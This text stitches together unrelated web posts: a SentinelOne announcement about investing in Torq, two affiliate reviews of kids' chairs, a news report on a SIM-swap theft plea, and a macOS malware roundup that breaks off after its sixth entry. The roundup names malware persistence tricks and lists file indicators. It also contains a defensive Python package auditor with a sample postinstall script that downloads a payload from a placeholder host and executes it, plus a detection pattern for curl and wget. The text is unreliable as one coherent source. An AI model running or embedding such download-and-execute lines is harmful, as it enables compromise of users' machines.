Reducing Human Effort in Cybersecurity | Why We Are Investing in Torq’s Automation Platform

At SentinelOne, we were delighted to play our part in helping Torq raise $50m in its Series B funding last week. We believe Torq’s no-code approach to automation will facilitate more complex workflows to respond to threats and play an essential role in developing XDR. Torq is on a mission to reinvent automation for security teams, a mission we at SentinelOne fully support. The importance of automation – of taking human effort out of the security equation – is central to our philosophy.

What is Torq?

Torq is a platform built around world-class automation, best practices templates, connectivity, and data tools. Torq aims to let security professionals connect to any security system needed and easily build automated workflows with a no-code approach.

Automation helps teams do more with limited resources, spend more time on the most valuable work, and increase productivity, which in turn reduces burnout and improves team retention.

Torq and the SentinelOne Platform

SentinelOne customers will find a variety of use-cases for Torq, including:

  • Supercharge Your Threat Hunting – create automated workflows to look for specific indicators across a fleet of SentinelOne-protected endpoints, allowing teams either to efficiently investigate the devices where they are found or to automate adding items to block lists.
  • Enrich Your Threat Intelligence – for every threat discovered on a SentinelOne-protected endpoint, automate additional analyses, update results within the SentinelOne platform and add automated notes.

More generally, security teams can add Torq workflows for

  • Responding to Suspicious User Activity – when detected, send a verification to the user via Slack. Either allow the action (if the user verifies) or quarantine the account or endpoint if not.
  • Remediating CSPM – automatically remediate simple issues, route alerts to multiple teams for fixes, and create ‘recommended action’ buttons in Jira, Slack, and other systems.
  • Easily onboarding/offboarding – orchestrate policy updates across all systems and automatically trigger flows. Require approvals for granting/removing sensitive permissions.

Why We’re Excited to See Torq Succeed

Decoupling automation and remediation from SOAR, and integrating with agnostic data sources to enable more complex workflows that respond to threats or even establish a proactive posture against them, is one of the keys to an open XDR offering. Torq’s no-code approach delivers on this vision and gives both security experts and novices an approachable, visual and declarative way to author automation, which is critical given the shortage of security professionals in our field.

We commend Torq for building a top-notch engineering team that delivers a simple, intuitive user experience that abstracts a very robust and well-thought-out platform. We are very excited to partner with the Torq team.

If you’d like to learn more about SentinelOne and Torq, contact us or request a free demo.

Is A Leather Chair Suitable For Kids?

Parents looking for stylish kids’ furniture that is both comfortable and affordable may want to consider the many benefits of leather chairs. Leather lounge chair designs have been around since ancient times, but they have become more modernized with time. In addition to being classy and quite comfortable, quality leather children’s furniture can be a great investment.

Regardless of the reasons for seeking new kids’ furniture, leather lounge chairs are an excellent choice. They are not only comfortable, but they come in many different colors and designs to satisfy your child’s personal taste. Leather lounge chairs for kids can look great in any bedroom or playroom and provide comfort and function. If you want to make a statement, leather chair designs will do it for you.

There are a few things to consider when purchasing leather chairs for kids:

  • The age of your child. Depending on their size, a leather chair may be too big or too small for them. It is important to find furniture that is both comfortable and manageable for your child to use.
  • Additionally, you will want to take into consideration their specific tastes. Some children want certain styles, while others prefer a more neutral style that would go with any décor.
  • Sustainability and eco-friendliness are other factors that should be considered when purchasing any type of furniture, but it is essential when purchasing items for kids. You want to make sure that neither you nor your little one has an issue with animal rights.

Faux leather chairs for kids – is it an alternative for kids’ leather chairs?

Leather as a material has a lot of benefits. It is not only comfortable, but it can last long and also adds a luxurious look to your house. Kids’ furniture made of leather is no exception. However, many feel that animal-based materials are cruel. Therefore, kids’ faux leather chairs have become very popular in today’s marketplace.

If you’re looking for a more affordable, animal-friendly option, faux leather chairs for kids may be the right choice for you. Faux leather is made from synthetic materials that look and feel like genuine leather. This makes it an excellent alternative for parents who want the look and feel of leather furniture but don’t want to harm any animals.

Faux leather chairs come in various colors and designs so that you can find the perfect one for your child’s bedroom or playroom. They are also very affordable, making them a great choice for parents on a budget.

Like leather furniture, it is important to consider your child’s age and taste when choosing faux leather chairs. Be sure to buy one that is the right size for your little one and one that they will be comfortable sitting in.

If you’re looking for a stylish, affordable addition to your child’s bedroom or playroom, faux leather kids’ chairs are an excellent choice!

Best Kids’ Faux Leather Chairs – Your Children Will Love Them

If you’re shopping for a lower-priced but high-quality kids’ chair, you will want to consider the kids’ faux leather chairs available from Amazon.com. We have gathered five of the best-selling and highest-rated faux leather chairs for kids on Amazon, so you can be sure your child will love their new chair.

Baby Care Leather Kids Sofa

The Baby Care Leather Kids Sofa is the perfect size for toddlers. It provides a comfortable and cozy place for your little one to relax. They will love crawling into this soft, faux leather chair to read their favorite book or watch cartoons.

The Baby Care Leather Kids Sofa is made of soffkin fabric, a type of synthetic leather. This makes it a durable and easy-to-clean chair. It is also waterproof and has antibacterial properties, making it a safe choice for kids.

The Baby Care Leather Kids Sofa receives 5 stars out of 5 on Amazon from over 100 reviews. Parents love the durable and waterproof material that this chair is made with. They also like how comfortable it is and rave about their children loving to sit in it.

Melissa & Doug Brown Coffee Faux Leather Child’s Armchair

The Melissa & Doug Child’s Armchair is a pleasant and well-made chair for toddlers and preschoolers. The faux leather kids’ chair comes in five colors: coffee, brown faux leather, denim, and pink. It is also an Amazon Exclusive, so you can only buy it there.

This kids’ armchair accommodates children aged three years and up, providing them the ideal cozy location to snuggle with their favorite toy, book, game, or activity. It can support a weight of up to 100 pounds.

The Melissa & Doug Brown Coffee Faux Leather Child’s Armchair receives 4.8 stars out of 5 on Amazon from over 500 reviews. Parents love how sturdy this chair is and how well the faux leather material holds up against their children’s wear and tear.

Amazon Basics Faux Leather Kids/Youth Recliner with Armrest Storage

The AmazonBasics Faux Leather Kids/Youth Recliner with Armrest Storage is perfect for children aged 3 and up. It has a weight capacity of 90 pounds and reclines all the way back. It is a perfect mini version of the recliner for adults! This makes it ideal for taking a quick nap or just relaxing after a long day of play.

The faux leather upholstery is easy to clean, and the chair comes in a variety of adorable colors, including brown, pink, and beige.

The armrests of this kids’ recliner hide a storage compartment for books, video game controllers, remotes, and more.

The AmazonBasics Faux Leather Kids/Youth Recliner with Armrest Storage receives 4.7 stars out of 5 on Amazon from over 1,500 reviews. Parents love the reclining function and color selection of this chair, as well as the storage compartments on the armrests. They also find that it is a very comfortable chair for their kids to relax in. It is also good value for money!

Flash Furniture Contemporary Brown LeatherSoft Kids Recliner with Cup Holder and Headrest

This easy recliner provides the comfort that grown-ups enjoy, making it ideal for small children. Your child will be entertained knowing they may sit in this push-back recliner while the family gathers in the living room to watch TV and movies.

The chair can support up to 90 pounds and has a safety mechanism that works as follows: as soon as the kid is in a seated position and the ottoman is pulled out one inch, the seat will recline. This child-sized recliner will look fantastic in your living room, bedroom, or playroom.

The LeatherSoft upholstery is resilient enough to withstand active children, making cleanup a breeze. With an enormous headrest, solid hardwood structure, and a cup holder in the arm to keep their favorite drink, you’ll have no trouble selecting this item.

Flash Furniture Contemporary Brown LeatherSoft Kids Recliner comes in a variety of different colors and has a 4.7-star rating on Amazon with over 8000 reviews! Parents love this chair for its sturdy build, comfortable design, and easy-to-clean fabric.

As you can see, there are many different types of chairs that are perfect for kids. No matter what your child’s personality or interests may be, you will be able to find a chair that suits them. You can even get matching furniture for the whole family!

Happy shopping and enjoy your new chair!

The post Is A Leather Chair Suitable For Kids? appeared first on Comfy Bummy.

NY Man Pleads Guilty in $20 Million SIM Swap Theft

A 24-year-old New York man who bragged about helping to steal more than $20 million worth of cryptocurrency from a technology executive has pleaded guilty to conspiracy to commit wire fraud. Nicholas Truglia was part of a group alleged to have stolen more than $100 million from cryptocurrency investors using fraudulent “SIM swaps,” scams in which identity thieves hijack a target’s mobile phone number and use that to wrest control over the victim’s online identities.

Truglia admitted to a New York federal court that he let a friend use his account at crypto-trading platform Binance in 2018 to launder more than $20 million worth of virtual currency stolen from Michael Terpin, a cryptocurrency investor who co-founded the first angel investor group for bitcoin enthusiasts.

Following the theft, Terpin filed a civil lawsuit against Truglia with the Los Angeles Superior Court. In May 2019, the jury awarded Terpin a $75.8 million judgment against Truglia. In January 2020, a New York grand jury criminally indicted Truglia (PDF) for his part in the crypto theft from Terpin.

A SIM card is the tiny, removable chip in a mobile device that allows it to connect to the provider’s network. Customers can legitimately request a SIM swap when their mobile device has been damaged or lost, or when they are switching to a different phone that requires a SIM card of another size.

Nicholas Truglia, holding bottle. Image: twitter.com/erupts

But fraudulent SIM swaps are frequently abused by scam artists who trick mobile providers into tying a target’s service to a new SIM card and mobile phone controlled by the scammers. Unauthorized SIM swaps often are perpetrated by fraudsters who have already stolen or phished a target’s password, as many financial institutions and online services rely on text messages to send users a one-time code for multi-factor authentication.

Compounding the threat, many websites let customers reset their passwords merely by clicking a link sent via SMS to the mobile phone number tied to the account, meaning anyone who controls that phone number can reset the passwords for those accounts.

Reached for comment, Terpin said his assailant got off easy.

“I am outraged that after nearly four years and hundreds of pages of evidence that the best the prosecutors could recommend was a plea bargain for a single, relatively minor count of the unauthorized use of a Binance exchange account, when all the evidence points toward Truglia being one of two masterminds of a wide-ranging criminal conspiracy to steal crypto from me and others,” Terpin told KrebsOnSecurity.

Terpin said public court records already show Truglia bragging about stealing his funds and using it to finance a lavish lifestyle.

“He at the very least withdrew 100 bitcoin (worth $1.6 million at the time and nearly $5 million today) from my theft into his wallet at a separate, US-based exchange, and then moved or spent it,” Terpin said. “The fact is that the intentional theft of $24 million, whether taken at the point of a gun in a bank or through a SIM card swap, is a major felony. Truglia should be prosecuted to the fullest extent of the law.”

Nicholas Truglia, showing off a diamond-studded Piaget watch while aboard a private jet. Image: twitter.com/erupts.

Terpin also is waging an ongoing civil lawsuit against 18-year-old Ellis Pinsky, who’s accused of working with Truglia as part of a SIM swapping crew that has stolen more than $100 million in cryptocurrency. According to Terpin, Pinsky was 15 when he took part in the $24 million 2018 SIM swap, but he returned $2 million worth of cryptocurrency after being confronted by Terpin’s investigators.

“On the surface, Pinsky is an ‘All American Boy,’” Terpin’s civil suit charges. “The son of privilege, he is active in extracurricular activities and lives a suburban life with a doting mother who is a prominent doctor.”

“Despite their wholesome appearances, Pinsky and his other cohorts are in fact evil computer geniuses with sociopathic traits who heartlessly ruin their innocent victims’ lives and gleefully boast of their multi-million-dollar heists,” the lawsuit continues. “Pinsky is reputed to have used his ill-gotten gains to purchase multi-million-dollar watches and is known to go on nightclub sprees at high end clubs in New York City, and Truglia rented private jets and played the part of a dashing playboy with young women pampering him.”

Pinsky could not be immediately reached for comment. But a review of the latest filings in the lawsuit shows that Pinsky’s attorneys stopped representing him because he no longer had the funds to pay for their services. The most recent entry in the New York Southern District’s docket asks the court to give Pinsky additional time to seek counsel, and hints that barring that he may end up representing himself.

Ellis Pinsky, in a photo uploaded to his social media profile.

Truglia is still being criminally prosecuted in Santa Clara, Calif., the home of the REACT task force, which pursues SIM-swapping cases nationwide. In November 2018, REACT investigators and New York authorities arrested Truglia on suspicion of using SIM swaps to steal approximately $1 million worth of cryptocurrencies from Robert Ross, a San Francisco father of two who later went on to found the victim advocacy website stopsimcrime.org.

According to published reports, Truglia and his accomplices also perpetrated SIM swaps against the CEO of the blockchain storage service 0Chain; hedge-funder Myles Danielson, vice president of Hall Capital Partners; and Gabrielle Katsnelson, the co-founder of the startup SMBX.

Truglia is currently slated to be sentenced in April 2022 for his guilty plea in New York. He faces a maximum sentence of up to 20 years in prison.

Erin West, deputy district attorney for Santa Clara County, told KrebsOnSecurity that SIM swapping remains a major problem. But she said many of the victims they’re now assisting are relatively new cryptocurrency investors for whom a SIM swapping attack can be financially devastating.

“Originally, the SIM swap targets were the early adopters of crypto,” West said. “Now we’re seeing a lot more of what I would call normal people trying their hand at crypto, and that makes a lot more people a target. It makes people who are unfamiliar with their personal security online vulnerable to hackers whose entire job is to figure out how to part people from their money.”

West said REACT continues to train state and local law enforcement officials across the country on how to successfully investigate and prosecute SIM swapping cases.

“The good news is our partners across the nation are learning how to conduct these cases,” she said. “Where this was a relatively new phenomenon three years ago, other smaller jurisdictions around the country are now learning how to prosecute this crime.”

All of the major wireless carriers let customers add security against SIM swaps and related schemes by setting a PIN that needs to be provided over the phone or in person at a store before account changes should be made. But these security features can be bypassed by incompetent or corrupt mobile store employees.

For some tips on how to minimize your chances of becoming the next SIM swapping victim, check out the “What Can You Do?” section at the conclusion of this story.

The best Frozen kids chairs for Disney fans

Disney Frozen is probably the most popular animated movie of the last couple of years. It has conquered millions of hearts and turned little girls everywhere into true fans eager to see anything and everything that had something to do with their beloved characters: Anna and Elsa. Well, we have great news for all of you Frozen fans out there!

We’ve done some research and found the best Frozen kids chairs for you to buy. Not only are they super exciting and fun, but they are also durable enough to hold the weight of your little princess (or prince) for years.

Take a look at some of the best Frozen kids chairs currently available:

Delta Children Upholstered Chair, Disney Frozen

It is no surprise that Delta Children’s kids’ chairs lead our list. The company is widely known for its attention to detail and quality of products. This specific one is no exception. It has a pretty straightforward design, but it looks super cute.

The polyester fabric of the chair backs promises durability while still being soft enough to be comfortable for your kids. The characters on the chair will keep your child entertained for hours on end, and the high-back design provides excellent support – perfect for those long movie nights. The chair is recommended for kids aged 3 and older, but it can hold weights of up to 100 pounds.

This chair is available in two different designs:

Price varies depending on chosen design – Frozen kids’ chair from Delta Children can cost between $65 and $95 on Amazon, which might seem like a lot for some of you; however, we believe this is one of the best Frozen kids chairs out there!

Delta Children Figural Upholstered Kids Chair, Disney Frozen II

We just can’t get enough of Delta Children’s products, and this Figural Upholstered Kids Chair is definitely one of our favorites. It features a slightly different design from the ones previously mentioned, as it sports a high-quality image of Elsa or Anna on the chair back. This gives the chair a unique look, and your child will definitely feel like a true Disney Frozen fan when sitting in it.

Like the other Delta Children’s chair, this one is also made out of polyester fabric that is not only soft but also durable. It is designed for children 3 years and up and can hold up to 100 pounds.

Check the retail price of the chair on Amazon by clicking at the name of the preferred Frozen character:

  • Elsa – Frozen II Delta Children Figural Upholstered Kids Chair
  • Anna – Frozen II Delta Children Figural Upholstered Kids Chair

Idea Nuova Frozen 2 Swivel Mesh Rolling Desk Chair

Having a good desk chair is crucial for all kids, especially those who love spending time doing homework or playing games in their room. This Idea Nuova Frozen 2 Swivel Mesh Rolling Desk Chair is perfect for all of you Frozen fans out there! It has a cool and modern design, featuring an image of Anna and Elsa on the back.

The chair is made out of high-quality mesh and plastic materials, making it both durable and lightweight. It also features a 360-degree swivel base, so your child can easily rotate to face the TV or desk. The chair can hold up to 225 pounds, making it perfect for both younger and older kids. The easy-to-use lever and pneumatic mechanism on this swivel workplace chair allow you to change its height to your desired level. The mesh cushioned seat is pleasant and straightforward to maintain. The curved mesh back provides support and comfort for the back.

Idea Nuova Frozen 2 Saucer Chair

A saucer chair is an original addition to any Frozen fan’s bedroom or playroom. This Idea Nuova Frozen 2 Saucer Chair is made out of high-quality and durable materials, featuring a beautiful image of the Frozen trio, Anna, Elsa and Olaf, on the back. It is perfect for kids who love to lounge around and watch TV, read books, or play games.

The saucer chair is made of a sturdy metal frame and soft and comfortable fabric. It can hold up to 80 pounds, making it perfect for both younger and older kids. The metal frame has a safety locking mechanism to keep the chair sturdy and in place. The Saucer Chair also features LED lights.

The saucer chair features a foldable design that makes it easy to store when not in use. It folds flat for simple, space-saving transportation and storage. This saucer chair won’t take up much room, making it a great purchase.

Kids’ Frozen chairs – bean bags

Bean bags are truly a timeless classic, and they can be just as stylish as the most fashionable chairs. If your kid loves to sit back and relax with a good book or watch TV, then a bean bag is the perfect addition to their room! Several bean bags featuring Frozen characters are available on the market, and we’ve chosen our favorites for you:

Disney Frozen Cozee Fluffy Chair by Delta Children

This soft and fluffy chair is perfect for all Frozen fans out there. It is made out of high-quality materials, featuring an image of Anna and Elsa on the front. The chair is designed for children aged 2-6 years old and can hold up to 60 pounds.

It provides greater comfort and support than traditional bean bag chairs since it is stuffed with shredded foam that shapes to your child’s body. The soft faux fur cover and supportive back ensure that youngsters have an oh-so-comfortable place of their own, and its lightweight construction means it can be taken anywhere your child goes. Side pockets on this chair are perfect for storing toys, books, or movie snacks.

As a bonus, the chair’s non-slip bottom keeps it in place. It’s the ideal piece of furniture for your playroom, bedroom, or living room.

Idea Nuova Disney Frozen 2 Elsa Figural Bean Bag Chair with Sherpa Trim

This Elsa Frozen Figural Bean Bag Chair is perfect for all of your favorite little Frozen fans. The bean bag is made out of soft and durable fabric, featuring a beautiful image of Elsa on the front. It is perfect for kids who love to lounge around and watch TV, read books, or play games.

This iconic chair is a must-have for all Frozen fans, thanks to its printed image of Elsa, which is studded with winter wonderland snowflakes. The chair has Sherpa piping on the seat and arms for added warmth and comfort. It is designed for children aged 2-5 years old.

It’s a great gift idea, especially during the colder months of the year. The soft plush fabrics ensure that your child will have a cozy place to relax after a long day of playing outside.

Idea Nuova Disney Frozen Figural Bean Bag Chair

The most classic bean bag chair on this list. This fantastic round figural kids’ bean bag chair is one Frozen fans will enjoy! You can’t go wrong with this adorable Frozen decorative bean bag, which features an embroidery of the famous character Elsa. It is an excellent addition to any space and a must-have in every child’s room.

This bean bag chair is made of polyester fabric and is sturdy and long-lasting. This bean bag chair can support up to 81 pounds. This bean bag chair is also relatively small, making it perfect for younger children. Plus, it is convenient to take it with you for movie nights at your friend’s or family members’ house.

Idea Nuova Frozen 2 Kids Nylon Bean Bag Chair with Piping & Top Carry Handle with Olaf Graphics

Frozen is not only about Elsa and Anna! This movie would not be the same without Olaf either. Kids can now enjoy their favorite Frozen scenes and characters with this Olaf bean bag chair! It is a perfect addition to any bedroom, living room, playroom, or even classroom. It has a design featuring Olaf’s smiling face on the front, and it is made out of high-quality nylon fabric, which will not fray over time.

The bean bag features a top carry handle for easy transportation from room to room as needed. This bean bag chair can hold up to 60 pounds and has a size of 18” x 18” x 11”. Great for kids aged 2-5 years old.

Bean bag chairs are the perfect gift idea, especially if they are character-themed. They are fun and comfy, so kids will love sitting on them watching TV, reading books, or playing games. All of these bean bags can be purchased on Amazon.

Frozen kids’ camping chairs for those Northern Adventures!

What’s a better way to enjoy the great outdoors than with an adventure inspired by Frozen? These chairs are perfect for your little ones who want to join in on all the fun! The chairs are made of durable and lightweight materials so that they can be easily transported from one spot to another. They are also comfortable, thanks to the padded seats and armrests, which provide better back support. The chairs can fold flat and include straps for easier transport. With these chairs, you can turn any outdoor event into something Frozen-tastic!

The Frozen-themed kids’ camping chairs from Jakks Pacific caught our attention. Jakks Pacific is a well-known toy and collectibles manufacturer that collaborates with some of the biggest licensors in the entertainment industry. Their Frozen camping chairs are officially licensed Disney products.

The chairs are designed for children aged 3 and up. They are made of polyester and have a weight limit of 100 pounds. The dimensions of the chairs are 21.5″D x 12.9″W x 20.38″H, and each weighs under 3 pounds.

Frozen-themed activity furniture for the kids’ playroom

There are tons of Frozen toys available, but how about some furniture? These activity tables are perfect for the Frozen-themed playroom!

Delta Children Kids Table and Chair Set

This activity table has a cute Frozen-themed design. The table and chairs are made of solid and durable wood, and they can be easily cleaned. The chairs can hold up to 50 pounds each.

The Frozen activity table is perfect for arts and crafts, snacks, or homework time. It would also be great for playing games or just reading a book. The table includes a storage bin where kids can keep all their art supplies.

The table and chairs set are ideal for children aged 2-6 years old. Kids won’t want to stop playing with them! They will be having so much fun!

Delta Children Kids Convertible Activity Bench, Disney Frozen II

It’s a must-have for any growing youngster. It has a 3-in-1 design that instantly transforms from a storage bench to a desk, allowing your child to transition between playtime and ideal homework conditions in seconds!

This extremely flexible workstation also includes two fabric bins beneath, making it the ideal location for kids to store their toys, books, or art materials. This durable activity bench can be used by children aged 3-7.

Idea Nuova Disney Frozen II 3 Piece Collapsible Set with Storage Table and 2 Ottomans

Give your children a place to sit and a place to store their belongings! The 3 Piece Storage Table and Ottoman Set is the ideal method to keep clutter at bay while still providing a location for your child to do everything from painting to eating supper. Table and ottomans are collapsible in design for easy storage when not in use.

Table and bench duet provides hours of playtime fun while doubling as a clean surface for snack time, crafts, and more.

How is Frozen so popular?

Quite simply, Frozen is popular because it is an excellent movie. It has a great story, lovable characters, beautiful animation, and catchy songs. But beyond that, Frozen has resonated with people on a deeper level.

Some say that Frozen speaks to the universal experience of being ostracized or feeling different. Elsa, the Snow Queen, has to hide her magical powers for fear of being rejected by society. This storyline is something that a lot of people can relate to.

Additionally, Frozen addresses important topics like love, sisterhood, and self-acceptance in a meaningful and entertaining way. This is why Frozen has become such a phenomenon and is sure to be a favorite for many years to come.

The post The best Frozen kids chairs for Disney fans appeared first on Comfy Bummy.

Top 10 macOS Malware Discoveries in 2021 | A Guide To Prevention & Detection

As we approach the end of 2021, we take a look at the year’s main malware discoveries targeting the macOS platform with an emphasis on highlighting the changing tactics, techniques and procedures being employed by threat actors. In particular, we hone in on what is unique about each malware discovery, who it targets and what its objectives are.

On top of that, you’ll find a breakdown of the essential behavior of each threat and links to deeper technical analyses. At the end of the post, we draw out the main lessons Mac admins and security teams can learn from this year’s crop of macOS malware to help them better protect their Mac fleets going into 2022.

Summary of Key Trends Emerging During 2021

As we will describe below, several things stand out about macOS malware in 2021. These include:

  • macOS targeted in more cross-platform malware campaigns, with malware written in Go, Kotlin and Python observed
  • A drive towards attacks on developers and other ‘high-value’ targets
  • An increasing interest in targeting macOS users in the East (China and Asia)
  • A continued reliance on using LaunchAgents as the primary persistence mechanism
  • While commodity adware is by far the most prevalent threat on macOS, most new malware families that emerged in 2021 focused on espionage and data theft.

In 2021 to date, there have been ten new reported malware discoveries. Let’s take a look at what was unique about each one and the main points that defenders need to be aware of.

Top 10 In-the-Wild macOS Malware Discoveries 2021

1. ElectroRAT

In January 2021, Intezer reported on Operation ElectroRAT, a campaign that had been running throughout 2020 targeting cryptocurrency users. This was the first instance of an increasingly common trend throughout 2021: cross-platform malware written in Go targeting the macOS, Linux and Windows operating systems. The aim was to get cryptocurrency users to install a trojanized application for trading and managing cryptocurrency.

All versions were built using Electron, and once the trojan app is installed and launched, a malicious background process called “mdworker” functions as the RAT, capable of keylogging, taking screenshots, executing shell commands, and uploading and downloading files. The name was carefully chosen: “mdworker” is also the name of a legitimate system binary that powers the Mac’s Spotlight search functionality.

The malicious mdworker binary is copied from the trojan bundle and written as a hidden file in the user’s home folder. Persistence is via a property list in the user’s LaunchAgents folder.

Primary IoCs:

~/Library/LaunchAgents/mdworker.plist
~/.mdworker
/Applications/eTrader.app/Contents/Utils/mdworker

Notable Characteristics:

  • Cross-platform RAT malware written in Go
  • Uses trojanized Crypto Trading applications
  • Attempts to hide as a system process (T1564.001)
  • Uses a Launch Agent for persistence (T1543.001)

2. OSAMiner

Also in January, SentinelLabs reported on OSAMiner, part of a campaign that had been in existence in various forms for at least five years and which appears to target primarily Chinese and Asian Mac users by installing a hidden Monero crypto miner.

OSAMiner was novel primarily for its extensive use of multiple, run-only AppleScripts. Due to the difficulty in reversing run-only AppleScripts, this technique helped it to hide its activity. As we shall see below, this technique (and indeed some of the code) was later copied by XCSSET.

Among other behaviors, the OSAMiner malware sets up a persistence agent and downloads the first stage of the miner by retrieving a URL embedded in a public web page.

OSAMiner persists via LaunchAgents that attempt to evade detection by using labels and file paths containing “com.apple”.

Primary IoCs:

~/Library/11.png
~/Library/k.plist
~/Library/LaunchAgents/com.apple.FY9.plist
~/Library/LaunchAgents/com.apple.HYQ.plist
~/Library/LaunchAgents/com.apple.2KR.plist
~/Library/Caches/com.apple.XX/ssl4.plist (where “XX” is any two uppercase letters)

Notable Characteristics:

  • Cryptominer
  • Uses a complex combination of run-only AppleScripts (T1059.002)
  • Retrieves next-stage URL embedded in a publicly-hosted image
  • Uses a Launch Agent for persistence (T1543.001)
  • Attempts to hide as a system process (T1564.001)

3. Silver Sparrow

First disclosed by researchers at Red Canary, Silver Sparrow was likely intended to function as an adware/PUP delivery mechanism for unscrupulous developers willing to pay the authors for a ‘pay per install’ (PPI) mechanism. As it was, Silver Sparrow’s infrastructure was taken down before any payloads were delivered, but the infection mechanism is an interesting – and hitherto unknown – way to abuse the Installer package that defenders and analysts should be aware of.

Installer packages typically use dedicated preinstall and postinstall shell scripts for preparing and cleaning up software installations. Silver Sparrow takes a different approach and abuses the package’s Distribution XML file, whose embedded JavaScript the Installer evaluates during the installation process, to execute bash commands via the Installer’s JavaScript API.

In the observed instances, this code sets up a persistence agent with the filename pattern init-.plist in ~/Library/LaunchAgents, writes a program executable with the file path pattern: ~/Library/Application Support/_updater/.sh, and attempts to download and execute a payload at /tmp/.

Primary IoCs:

~/Library/Application Support/verx_updater/verx.sh
~/Library/LaunchAgents/init_verx.plist
~/Library/LaunchAgents/verx.plist
~/Library/LaunchAgents/init_agent.plist
~/Library/Application Support/agent_updater

Notable Characteristics:

  • Adware Loader
  • Uses the Distribution file in Apple Package Installer
  • Downloads malware with Bash commands (T1059.004)
  • Uses the JavaScript API (T1059.007)
  • Uses a Launch Agent for persistence (T1543.001)

4. Silver Toucan/WizardUpdate/UpdateAgent

Known by several names, this Adload dropper was independently discovered by Red Canary, Confiant and Microsoft across late February/early March 2021, with Microsoft still tracking changes as recently as October. Early versions of the dropper were distinctive in the way they used curl and Amazon AWS instances to download various second and third stage payloads. Microsoft also noted that UpdateAgent deploys a Gatekeeper bypass, but what particularly caught attention was that the actor succeeded in getting all of their malicious packages through Apple’s Notarization process.

According to a tweet from Confiant, the trick is deceptively simple: create a benign application in a standard Apple package installer, and use the package’s postinstall script to pull down the malware.

The lesson here is clear: neither Gatekeeper nor Notarization guarantees that a download is malware free. A notarized package is one whose static contents passed Apple’s scan, which says nothing about what its install scripts fetch at install time. Seek help from other sources!
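The two package tricks described above (Silver Sparrow’s Distribution-file JavaScript and UpdateAgent’s payload-fetching postinstall script) can both be caught by looking inside the package before it is installed. The following is an added example written for this post, not code from SentinelOne or from any of the vendors cited; it audits an installer package that has already been expanded on macOS with `pkgutil --expand suspect.pkg <dir>` and works on the resulting directory, so the audit itself runs anywhere. The indicator list, the sample package it builds, and the `example.invalid` URL are our own constructions, not real indicators.

```python
import os
import re
import tempfile

# Our own indicator list: JavaScript in the Distribution file that shells out
# during installation, and pre/postinstall scripts that fetch or stage code.
DIST_EXEC = re.compile(r"system\.run\s*\(")
SCRIPT_FETCH = re.compile(r"\b(curl|wget|osascript)\b|base64|/private/tmp/|/tmp/")


def audit_expanded_pkg(pkgdir):
    """Return (indicator, path) pairs for a package expanded with
    `pkgutil --expand suspect.pkg <pkgdir>` (the expand step needs macOS;
    this function only needs the directory it produces)."""
    findings = []
    dist = os.path.join(pkgdir, "Distribution")
    if os.path.isfile(dist):
        with open(dist, errors="replace") as f:
            if DIST_EXEC.search(f.read()):
                # Silver Sparrow's trick: Installer JavaScript calling system.run()
                findings.append(("distribution-system-run", dist))
    for root, _dirs, files in os.walk(pkgdir):
        for name in files:
            if name not in ("preinstall", "postinstall"):
                continue
            path = os.path.join(root, name)
            with open(path, errors="replace") as f:
                if SCRIPT_FETCH.search(f.read()):
                    # UpdateAgent's trick: a notarized, benign-looking package whose
                    # postinstall script downloads the real payload
                    findings.append(("install-script-fetch-or-stage", path))
    return findings


def build_sample_pkg():
    """Constructed sample (not a real package): an expanded distribution package
    showing both techniques. The URL and paths are placeholders."""
    d = tempfile.mkdtemp(prefix="pkg_audit_")
    with open(os.path.join(d, "Distribution"), "w") as f:
        f.write(
            '<?xml version="1.0" encoding="utf-8"?>\n'
            '<installer-gui-script minSpecVersion="2">\n'
            "<script>\n"
            "function installationCheck() {\n"
            "  system.run('bash', '-c', 'mkdir -p ~/Library/LaunchAgents');\n"
            "  return true;\n"
            "}\n"
            "</script>\n"
            "</installer-gui-script>\n"
        )
    scripts = os.path.join(d, "benign.pkg", "Scripts")
    os.makedirs(scripts)
    with open(os.path.join(scripts, "postinstall"), "w") as f:
        f.write(
            "#!/bin/bash\n"
            "curl -s http://example.invalid/payload -o /tmp/payload\n"
            "chmod +x /tmp/payload && /tmp/payload\n"
        )
    return d


if __name__ == "__main__":
    sample = build_sample_pkg()
    for indicator, path in audit_expanded_pkg(sample):
        print(indicator, path)
```

Run it against a real package by pointing `audit_expanded_pkg` at the output of `pkgutil --expand`; a hit on either indicator is a reason to read the script in full, since legitimate packages do occasionally call curl in postinstall, but a notarization stamp on the package tells you nothing about that script’s behaviour.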

Primary IoCs:

/Library/Application Support/Helper/HelperModule
/Library/Application Support/WebVideoPlayer/WebVideoPlayerAgent
/Library/Application Support/McSnip/McSnipAgent
~/Library/Application Support/Quest/QuestBarStatusAgent
~/Library/Application Support/SubVideoTube/SubVideoTubeStatusAgent

Notable Characteristics:

  • Loader platform
  • Uses postinstall script to download payloads (T1059.004)
  • Ingress Tool/File Transfer with CURL (T1105)
  • Makes use of public cloud infrastructure for C2s
  • Malware is Notarized by Apple
  • Malware uses a Gatekeeper bypass

5. XcodeSpy

In March, SentinelLabs reported on what looked very much like a targeted attack on iOS developers using Apple’s Xcode. XcodeSpy, a trojanized Xcode project, was found in the wild targeting iOS developers with an EggShell backdoor. The malicious project was a doctored version of a legitimate, open-source project available on GitHub, which would execute an obfuscated Run Script when the developer’s build target was launched.

The dropped EggShell backdoor is a Mach-O executable able to record information from the victim’s microphone, camera, and keyboard.

While the combination of a trojanized Xcode project and an obfuscated Run Script is a novel vector, the malware uses a tried-and-tested persistence technique, installing a user LaunchAgent and trying to disguise it as a legitimate Apple file.

Primary IoCs:

~/Library/LaunchAgents/com.apple.usagestatistics.plist 
~/Library/LaunchAgents/com.apple.appstore.checkupdate.plist
~/Library/Application Scripts/com.apple.Preview/.stors
~/Library/Application Scripts/com.apple.TextEdit/.scriptdb
~/Library/Application Support/com.apple.AppStore/.update
/private/tmp/.tag

Notable Characteristics:

  • Backdoor
  • Infostealer – Input Capture via Keylogger (T1056.001, T1056)
  • Uses a Mach-O, customized EggShell instance
  • Uses a Launch Agent for persistence (T1543.001)
  • Attempts to hide as a system process (T1564.001)

6. WildPressure

In July, Kaspersky revealed details of another cross-platform Trojan with a macOS component. According to the researchers, WildPressure is a newly-identified APT operation targeting entities in the Middle East. The macOS component of WildPressure is embedded in a Python file, which itself is executed persistently by a LaunchAgent using com.apple as part of the label name in an effort to blend in with system processes.

The same Python file has some rudimentary AV detection logic.

While Python-based post-exploit kits are common enough on all platforms, this is the first time we have seen APT-level malware on macOS making use of a Python script in the program arguments of a LaunchAgent.

Primary IoCs:

~/Library/LaunchAgents/com.apple.pyapple.plist
~/Library/LaunchAgents/apple.scriptzxy.plist
